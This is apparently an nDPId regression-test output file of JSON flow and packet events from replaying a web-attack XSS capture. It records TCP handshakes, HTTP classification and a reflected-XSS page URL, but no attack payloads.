-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8539,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347997344,"flow_last_seen":1499347997344,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347997344,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34886,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8539,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":603,"flow_packet_id":1,"flow_last_seen":1499347997344,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347997344,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nDhAAD4GKZisEAABwKgKMohGAFAyaklNAAAAAKACchCEBAAAAgQFtAQCCAoBPNV1AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8540,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":603,"flow_packet_id":2,"flow_last_seen":1499347997344,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347997344,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiEaQGXl+MmpJTqAScSDQewAAAgQFtAQCCAoD5qbpATzVdQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8541,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":603,"flow_packet_id":3,"flow_last_seen":1499347997345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347997345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0nDlAAD4GKZ+sEAABwKgKMohGAFAyaklOkBl5f4AQAOVvgwAAAQEICgE81XUD5qbp"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8551,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347998605,"flow_last_seen":1499347998605,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998605,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34900,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8551,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_packet_id":1,"flow_last_seen":1499347998605,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347998605,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MQxAAD4GlMSsEAABwKgKMohUAFBMT+e8AAAAAKACchDKZgAAAgQFtAQCCAoBPNawAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8552,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_packet_id":2,"flow_last_seen":1499347998605,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347998605,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiFT+qOY2TE\/nvaAScSA6WwAAAgQFtAQCCAoD5qgkATzWsAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8553,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_packet_id":3,"flow_last_seen":1499347998606,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347998606,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MQ1AAD4GlMusEAABwKgKMohUAFBMT+e9\/qjmN4AQAOXZYQAAAQEICgE81rED5qgk"} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347807664,"flow_last_seen":1499347876003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232685,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347867086,"flow_last_seen":1499347872866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33526,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347867086,"flow_last_seen":1499347872866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33526,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347868358,"flow_last_seen":1499347873865,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33540,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347868358,"flow_last_seen":1499347873865,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347869628,"flow_last_seen":1499347874866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33554,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347869628,"flow_last_seen":1499347874866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33554,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347873465,"flow_last_seen":1499347878867,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33594,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347873465,"flow_last_seen":1499347878867,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33594,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347874737,"flow_last_seen":1499347879867,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33608,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347874737,"flow_last_seen":1499347879867,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33608,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8572,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348001148,"flow_last_seen":1499348001148,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348001148,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34926,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8572,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":605,"flow_packet_id":1,"flow_last_seen":1499348001148,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348001148,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8pkpAAD4GH4asEAABwKgKMohuAFDUG39mAAAAAKACchCoWgAAAgQFtAQCCAoBPNksAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8573,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":605,"flow_packet_id":2,"flow_last_seen":1499348001148,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348001148,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiG4I9+h41Bt\/Z6AScSAJQwAAAgQFtAQCCAoD5qqgATzZLAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8574,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":605,"flow_packet_id":3,"flow_last_seen":1499348001148,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348001148,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0pktAAD4GH42sEAABwKgKMohuAFDUG39nCPfoeYAQAOWoSgAAAQEICgE82SwD5qqg"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8581,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348002450,"flow_last_seen":1499348002450,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348002450,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8581,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_packet_id":1,"flow_last_seen":1499348002450,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348002450,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80ydAAD4G8qisEAABwKgKMoh8AFCQawlWAAAAAKACchBgyAAAAgQFtAQCCAoBPNpxAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8582,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_packet_id":2,"flow_last_seen":1499348002450,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348002450,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiHx5OBm2kGsJV6AScSAe7QAAAgQFtAQCCAoD5qvlATzacQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8583,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_packet_id":3,"flow_last_seen":1499348002450,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348002450,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00yhAAD4G8q+sEAABwKgKMoh8AFCQawlXeTgZt4AQAOW98wAAAQEICgE82nID5qvl"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8593,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348003742,"flow_last_seen":1499348003742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348003742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34954,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8593,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":607,"flow_packet_id":1,"flow_last_seen":1499348003742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348003742,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Q\/NAAD4Ggd2sEAABwKgKMoiKAFCK7JhGAAAAAKACchDWBAAAAgQFtAQCCAoBPNu1AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8594,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":607,"flow_packet_id":2,"flow_last_seen":1499348003742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348003742,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiIrxrFQGiuyYR6AScSDgIAAAAgQFtAQCCAoD5q0pATzbtQEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8595,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":607,"flow_packet_id":3,"flow_last_seen":1499348003743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348003743,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Q\/RAAD4GgeSsEAABwKgKMoiKAFCK7JhH8axUB4AQAOV\/KAAAAQEICgE827UD5q0p"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8611,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348006334,"flow_last_seen":1499348006334,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348006334,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34980,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8611,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_packet_id":1,"flow_last_seen":1499348006334,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348006334,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NJlAAD4GkTesEAABwKgKMoikAFAqsOqkAAAAAKACchDhQAAAAgQFtAQCCAoBPN49AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8612,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_packet_id":2,"flow_last_seen":1499348006334,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348006334,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiKQqwf7AKrDqpaAScSAFBgAAAgQFtAQCCAoD5q+xATzePQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8613,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_packet_id":3,"flow_last_seen":1499348006335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348006335,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NJpAAD4GkT6sEAABwKgKMoikAFAqsOqlKsH+wYAQAOWkDQAAAQEICgE83j0D5q+x"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8623,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348002450,"flow_last_seen":1499348007347,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499348007347,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34940,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8627,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348007599,"flow_last_seen":1499348007599,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348007599,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8627,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_packet_id":1,"flow_last_seen":1499348007599,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348007599,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+WFAAD4GzG6sEAABwKgKMoiyAFBEayYYAAAAAKACchCKyAAAAgQFtAQCCAoBPN95AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8628,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_packet_id":2,"flow_last_seen":1499348007599,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348007599,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiLJr5HteRGsmGaAScSDvkAAAAgQFtAQCCAoD5rDtATzfeQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_packet_id":3,"flow_last_seen":1499348007600,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348007600,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+WJAAD4GzHWsEAABwKgKMoiyAFBEayYZa+R7X4AQAOWOmAAAAQEICgE833kD5rDt"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347877292,"flow_last_seen":1499347882869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33634,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347877292,"flow_last_seen":1499347882869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33634,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347878568,"flow_last_seen":1499347883869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33648,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347878568,"flow_last_seen":1499347883869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33648,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347881141,"flow_last_seen":1499347886869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33674,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 